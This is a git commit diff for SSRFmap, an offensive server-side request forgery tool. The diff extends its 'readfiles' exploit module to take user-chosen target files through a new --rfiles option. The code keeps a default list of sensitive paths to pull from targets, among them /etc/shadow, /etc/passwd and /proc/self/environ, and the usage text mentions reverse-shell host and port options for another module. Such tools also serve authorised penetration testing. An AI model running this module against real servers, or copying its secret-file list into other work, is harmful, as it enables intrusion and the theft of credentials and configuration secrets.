Merge pull request #35 from ScarletTeam/master
Allows readfiles module to read specific files specified in a parameter when starting the ssrfmap.py scriptpull/41/head
commit
c7922ba0ab
|
@ -1,6 +1,7 @@
|
|||
from core.utils import *
|
||||
import logging
|
||||
import os
|
||||
from argparse import ArgumentParser
|
||||
|
||||
name = "readfiles"
|
||||
description = "Read files from the target"
|
||||
|
@ -8,12 +9,13 @@ author = "Swissky"
|
|||
documentation = []
|
||||
|
||||
class exploit():
|
||||
files = ["/etc/passwd", "/etc/lsb-release", "/etc/shadow", "/etc/hosts", "\/\/etc/passwd", "/proc/self/environ", "/proc/self/cmdline", "/proc/self/cwd/index.php", "/proc/self/cwd/application.py", "/proc/self/cwd/main.py", "/proc/self/exe"]
|
||||
|
||||
|
||||
def __init__(self, requester, args):
|
||||
logging.info("Module '{}' launched !".format(name))
|
||||
|
||||
self.files = args.targetfiles.split(',') if args.targetfiles != None else ["/etc/passwd", "/etc/lsb-release", "/etc/shadow", "/etc/hosts", "\/\/etc/passwd", "/proc/self/environ", "/proc/self/cmdline", "/proc/self/cwd/index.php", "/proc/self/cwd/application.py", "/proc/self/cwd/main.py", "/proc/self/exe"]
|
||||
|
||||
r = requester.do_request(args.param, "")
|
||||
|
||||
if r != None:
|
||||
default = r.text
|
||||
|
||||
|
@ -36,3 +38,6 @@ class exploit():
|
|||
logging.info("\033[32mWriting file\033[0m : {} to {}".format(f, directory + "/" + filename))
|
||||
with open(directory + "/" + filename, 'w') as f:
|
||||
f.write(diff)
|
||||
|
||||
else:
|
||||
print("Empty response")
|
||||
|
|
|
@ -23,6 +23,7 @@ def parse_args():
|
|||
python ssrfmap.py -r data/request.txt -p url -m redis
|
||||
python ssrfmap.py -r data/request.txt -p url -m portscan --ssl --uagent "SSRFmapAgent"
|
||||
python ssrfmap.py -r data/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242
|
||||
python ssrfmap.py -r data/request.txt -p url -m readfiles --rfiles
|
||||
'''
|
||||
parser = argparse.ArgumentParser(epilog=example_text, formatter_class=argparse.RawDescriptionHelpFormatter)
|
||||
parser.add_argument('-r', action ='store', dest='reqfile', help="SSRF Request file")
|
||||
|
@ -32,10 +33,11 @@ def parse_args():
|
|||
parser.add_argument('-v', action ='store', dest='verbose', help="Enable verbosity", nargs='?', const=True)
|
||||
parser.add_argument('--lhost', action ='store', dest='lhost', help="LHOST reverse shell")
|
||||
parser.add_argument('--lport', action ='store', dest='lport', help="LPORT reverse shell")
|
||||
parser.add_argument('--rfiles', action ='store', dest='targetfiles', help="Files to read with readfiles module", nargs='?', const=True)
|
||||
parser.add_argument('--uagent',action ='store', dest='useragent', help="User Agent to use")
|
||||
parser.add_argument('--ssl', action ='store', dest='ssl', help="Use HTTPS without verification", nargs='?', const=True)
|
||||
parser.add_argument('--level', action ='store', dest='level', help="Level of test to perform (1-5, default: 1)", nargs='?', const=1, default=1, type=int)
|
||||
results = parser.parse_args()
|
||||
results = parser.parse_args()
|
||||
|
||||
if results.reqfile == None:
|
||||
parser.print_help()
|
||||
|
@ -55,4 +57,4 @@ if __name__ == "__main__":
|
|||
|
||||
# SSRFmap
|
||||
args = parse_args()
|
||||
ssrf = SSRF(args)
|
||||
ssrf = SSRF(args)
|
||||
|
|
Loading…
Reference in New Issue